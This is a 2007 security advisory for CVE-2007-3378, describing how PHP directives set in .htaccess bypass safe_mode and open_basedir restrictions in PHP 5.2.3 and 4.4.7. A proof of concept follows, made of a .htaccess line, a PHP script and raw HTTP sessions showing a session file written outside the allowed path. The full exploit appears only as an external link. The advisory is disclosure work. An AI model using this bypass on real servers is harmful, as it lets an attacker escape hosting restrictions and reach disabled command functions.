[PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ] Author: Maksymilian Arciemowicz Date: - - Written: 10.02.2007 - - Public: 27.06.2007 CVE: CVE-2007-3378 Risk: High Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so. php_value name value Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value. Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead. php_flag name on|off Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode http://pl.php.net/manual/en/configuration.changes.php - --- 1. htaccess safemode and open_basedir Bypass Vulnerability --- When using PHP as an Apache module, you can also change the configuration settings using directives in .htaccess file. These options are used by a lot of users to change permissions options like display_errors etc. But it is possible to bypass a safe_mode or open_basedir in different functions.For example you can set session.save_path via .htaccess. In function session_save_path() and ini_set() save_path is checked for safe_mode and open_basedir. In .htaccess it is bypassed. Values from .htaccess are not checked. For example: cxib# ls -la /www/cxib/ total 14 drwxr-xr-x 3 cxib www 512 Feb 16 20:20 . drwxr-xr-x 11 www www 7168 Feb 16 20:07 .. - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/stars.php <?php session_save_path("/inne"); session_start(); ?> cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:22:58 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Content-Length: 732 Content-Type: text/html <br /> <b>Warning</b>: session_save_path() [<a href='function.session-save-path'>function.session-save-path</a>]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>2</b><br /> <br /> <b>Warning</b>: session_start() [<a href='function.session-start'>function.session-start</a>]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>3</b><br /> <br /> <b>Fatal error</b>: session_start() [&lt;a href='function.session-start'&gt;function.session-start&lt;/a&gt;]: Failed to initialize storage module: files (path: ) in <b>/www/cxib/stars.php</b> on line <b>3</b><br /> Connection closed by foreign host. cxib# So we can't create session in directory. But when we create file .htaccess, we can write there: - --- php_value session.save_path /inne - --- cxib# ls -la /www/cxib/ total 16 drwxr-xr-x 3 cxib www 512 Feb 16 20:26 . drwxr-xr-x 11 www www 7168 Feb 16 20:26 .. - -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess - -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps cxib# cat /www/cxib/.htaccess php_value session.save_path /inne cxib# cat /www/cxib/stars.php <?php session_start(); ?> We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request. cxib# telnet 0 80 Trying 0.0.0.0... Connected to 0. Escape character is '^]'. GET /cxib/stars.php HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 16 Feb 2007 19:30:42 GMT Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html Connection closed by foreign host. cxib# cxib# ls -la /inne total 3 drwxrwxrwx 2 root wheel 512 Feb 16 20:30 . drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 .. - -rw------- 1 www wheel 0 Feb 16 20:30 sess_45cae9284f2f8b7cb05ce96021c9bf4e Open_basedir and safe_mode are bypassed. Same problem is in error_log and probably in other functions. This issue allows attacker to bypass disabled_functions like system, exec etc. We have contacted with Stefan Esser to verify this issue, big thanks for him. In PHP 5.2.3 it is possible to execute command using exploit if mail() function is allowed. - --- 2. Exploit --- !WARNING! This exploit will be public on 29.06.2007 Tested on: PHP 5.2.3 FreeBSD 6.2. PHP 5.2.3 OpenBSD 4.1 Only for PHP5: http://securityreason.com/achievement_exploitalert/9 - --- 3. How to fix --- This bug has been founded on February 2007 We are still awaiting for reply from PHP Team. - --- 4. Greets --- Stefan Esser - --- 5. Contact --- Author: Maksymilian Arciemowicz